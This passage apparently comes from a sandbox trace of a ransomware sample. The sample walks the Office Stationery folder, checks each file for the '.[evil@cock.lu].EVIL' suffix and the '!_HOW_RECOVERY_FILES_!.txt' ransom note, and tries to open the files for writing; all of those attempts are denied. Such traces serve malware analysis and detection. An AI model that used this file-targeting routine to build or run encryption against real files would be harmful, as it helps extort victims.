wcsstr (_Str="Garden.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.114] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 69 [0089.114] wcscmp (_String1="Garden.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.114] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Garden.htm") returned 0x0 [0089.114] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 0x45 [0089.114] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.114] GetLastError () returned 0x5 [0089.114] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.114] wcsstr (_Str="Garden.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.114] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 69 [0089.114] wcscmp (_String1="Garden.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.114] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Garden.jpg") returned 0x0 [0089.114] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 0x45 [0089.114] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.115] GetLastError () returned 0x5 [0089.115] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.115] wcsstr (_Str="Genko_1.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.115] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf") returned 70 [0089.115] wcscmp (_String1="Genko_1.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.115] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Genko_1.emf") returned 0x0 [0089.115] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf") returned 0x46 [0089.115] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.115] GetLastError () returned 0x5 [0089.115] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.115] wcsstr (_Str="Genko_2.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.115] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf") returned 70 [0089.115] wcscmp (_String1="Genko_2.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.115] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Genko_2.emf") returned 0x0 [0089.115] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf") returned 0x46 [0089.115] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.115] GetLastError () returned 0x5 [0089.115] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.115] wcsstr (_Str="Graph.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.115] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf") returned 68 [0089.115] wcscmp (_String1="Graph.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.115] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Graph.emf") returned 0x0 [0089.115] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf") returned 0x44 [0089.115] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.116] GetLastError () returned 0x5 [0089.116] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.116] wcsstr (_Str="Green Bubbles.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.116] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 76 [0089.116] wcscmp (_String1="Green Bubbles.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.116] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Green Bubbles.htm") returned 0x0 [0089.116] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 0x4c [0089.116] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.116] GetLastError () returned 0x5 [0089.116] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.116] wcsstr (_Str="GreenBubbles.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.116] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 75 [0089.116] wcscmp (_String1="GreenBubbles.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.116] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="GreenBubbles.jpg") returned 0x0 [0089.116] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 0x4b [0089.117] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.117] GetLastError () returned 0x5 [0089.117] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.117] wcsstr (_Str="grid_(cm).wmf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.117] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf") returned 72 [0089.117] wcscmp (_String1="grid_(cm).wmf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.117] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="grid_(cm).wmf") returned 0x0 [0089.117] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf") returned 0x48 [0089.117] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.117] GetLastError () returned 0x5 [0089.117] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.117] wcsstr (_Str="grid_(inch).wmf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.117] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf") returned 74 [0089.117] wcscmp (_String1="grid_(inch).wmf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.117] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="grid_(inch).wmf") returned 0x0 [0089.118] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf") returned 0x4a [0089.118] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.118] GetLastError () returned 0x5 [0089.118] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.118] wcsstr (_Str="Hand Prints.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.118] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 74 [0089.118] wcscmp (_String1="Hand Prints.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.118] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Hand Prints.htm") returned 0x0 [0089.118] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 0x4a [0089.118] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.119] GetLastError () returned 0x5 [0089.119] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.119] wcsstr (_Str="HandPrints.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.119] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 73 [0089.119] wcscmp (_String1="HandPrints.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.119] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HandPrints.jpg") returned 0x0 [0089.119] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 0x49 [0089.119] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.119] GetLastError () returned 0x5 [0089.119] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.119] wcsstr (_Str="Memo.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.119] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf") returned 67 [0089.119] wcscmp (_String1="Memo.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.119] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Memo.emf") returned 0x0 [0089.119] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf") returned 0x43 [0089.119] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.120] GetLastError () returned 0x5 [0089.120] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.120] wcsstr (_Str="Monet.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.120] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg") returned 68 [0089.120] wcscmp (_String1="Monet.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.120] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Monet.jpg") returned 0x0 [0089.120] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg") returned 0x44 [0089.120] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.120] GetLastError () returned 0x5 [0089.120] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.120] wcsstr (_Str="Month_Calendar.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.120] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf") returned 77 [0089.120] wcscmp (_String1="Month_Calendar.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.120] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Month_Calendar.emf") returned 0x0 [0089.120] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf") returned 0x4d [0089.121] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.121] GetLastError () returned 0x5 [0089.121] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.121] wcsstr (_Str="Music.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.121] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf") returned 68 [0089.121] wcscmp (_String1="Music.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.121] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Music.emf") returned 0x0 [0089.121] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf") returned 0x44 [0089.121] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.121] GetLastError () returned 0x5 [0089.121] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.121] wcsstr (_Str="Notebook.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.121] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg") returned 71 [0089.121] wcscmp (_String1="Notebook.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.121] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Notebook.jpg") returned 0x0 [0089.121] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg") returned 0x47 [0089.121] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.122] GetLastError () returned 0x5 [0089.122] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.122] wcsstr (_Str="Orange Circles.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.122] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 77 [0089.122] wcscmp (_String1="Orange Circles.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.122] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Orange Circles.htm") returned 0x0 [0089.122] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 0x4d [0089.122] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.122] GetLastError () returned 0x5 [0089.123] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.123] wcsstr (_Str="OrangeCircles.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.123] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg") returned 76 [0089.123] wcscmp (_String1="OrangeCircles.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.123] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OrangeCircles.jpg") returned 0x0 [0089.123] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg") returned 0x4c [0089.123] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.123] GetLastError () returned 0x5 [0089.123] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.123] wcsstr (_Str="Peacock.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.123] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 70 [0089.123] wcscmp (_String1="Peacock.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.123] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Peacock.htm") returned 0x0 [0089.123] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 0x46 [0089.123] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.123] GetLastError () returned 0x5 [0089.123] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.123] wcsstr (_Str="Peacock.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.123] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg") returned 70 [0089.123] wcscmp (_String1="Peacock.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.123] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Peacock.jpg") returned 0x0 [0089.123] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg") returned 0x46 [0089.124] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.130] GetLastError () returned 0x5 [0089.130] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.130] wcsstr (_Str="Pine_Lumber.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.130] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg") returned 74 [0089.130] wcscmp (_String1="Pine_Lumber.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.130] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Pine_Lumber.jpg") returned 0x0 [0089.130] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg") returned 0x4a [0089.130] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.130] GetLastError () returned 0x5 [0089.130] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.130] wcsstr (_Str="Pretty_Peacock.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.130] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg") returned 77 [0089.130] wcscmp (_String1="Pretty_Peacock.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.130] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Pretty_Peacock.jpg") returned 0x0 [0089.130] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg") returned 0x4d [0089.130] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.130] GetLastError () returned 0x5 [0089.130] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.130] wcsstr (_Str="Psychedelic.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.130] _snwprintf (in: _Dest=0x84b0fde170, 